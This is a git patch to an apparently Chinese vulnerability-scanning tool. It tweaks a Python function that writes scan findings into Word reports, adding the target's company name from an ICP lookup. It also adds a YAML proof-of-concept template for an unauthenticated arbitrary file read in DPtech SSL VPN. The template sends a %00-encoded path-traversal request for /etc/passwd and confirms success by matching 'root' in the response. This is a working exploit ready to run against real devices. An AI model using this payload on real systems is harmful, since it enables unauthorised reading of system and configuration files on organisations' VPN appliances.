From 73647db414a8d82374278417c602a22aa50ada28 Mon Sep 17 00:00:00 2001 From: MasonLiu <2857911564@qq.com> Date: Sat, 12 Oct 2024 13:35:03 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BC=98=E5=8C=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- new_poc_tools.py | 7 +++++-- poc/SE-Poc/DPsslvpn-ReadFile.yaml | 29 +++++++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 2 deletions(-) create mode 100644 poc/SE-Poc/DPsslvpn-ReadFile.yaml diff --git a/new_poc_tools.py b/new_poc_tools.py index b172448..84feb20 100644 --- a/new_poc_tools.py +++ b/new_poc_tools.py @@ -112,13 +112,16 @@ def extract_root_domain(url): def add_scan_results_to_document(document, domain, results, include_all, description, choice_3): for name, result, status_code, url, res_time in results: if include_all or result == "存在漏洞": + company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain)) document.add_heading(f"目标:{domain}", level=3) document.add_paragraph(f"漏洞名称:{name}") + document.add_paragraph(f"公司名称:{company_name}") document.add_paragraph(f"漏洞链接:{url}") - document.add_paragraph(f"响应状态码:{status_code}") + document.add_paragraph(f"响应状态:{status_code}") document.add_paragraph(f"响应时间:{res_time}") document.add_paragraph(f"漏洞情况:{result}") document.add_paragraph("\n") + if result == "存在漏洞" and choice_3 == "y": screenshot_path_1 = screenshot(url) # print(screenshot_path_1) @@ -147,7 +150,7 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip if not os.path.exists(doc_save_path): os.mkdir(doc_save_path) #保存word,根据需要自行更改 - company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain)) + doc_name = str(company_name) + "_" + name + ".docx" doc.save(doc_save_path + doc_name) diff --git a/poc/SE-Poc/DPsslvpn-ReadFile.yaml b/poc/SE-Poc/DPsslvpn-ReadFile.yaml new file mode 100644 index 0000000..0efacb5 --- /dev/null +++ b/poc/SE-Poc/DPsslvpn-ReadFile.yaml @@ -0,0 +1,29 @@ +keyword: DPtech SSLVPN +name: 迪普SSL VPN 任意文件读取 +description: | # 下一行可填写漏洞描述 + 迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 +requests: # 为空代表默认或者不启用 + path: "/.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd" + method: GET + headers: + Accept: '*/*' + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 + Referer: https://www.baidu.com + Accept-Encoding: gzip, deflate + Connection: keep-alive + body-raw: |- # 如果需要发送请求体,在下一行开始填写 + + +response: + path: "" # 不填则默认接收此请求的响应包 + status-code: 200 + body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息 + time: # 此处填写响应包响应时间,默认不启用 + headers: + Server: + Content-type: + Content-length: + Date: + Connection: +impact: | # 下一行可填写漏洞影响 + 迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。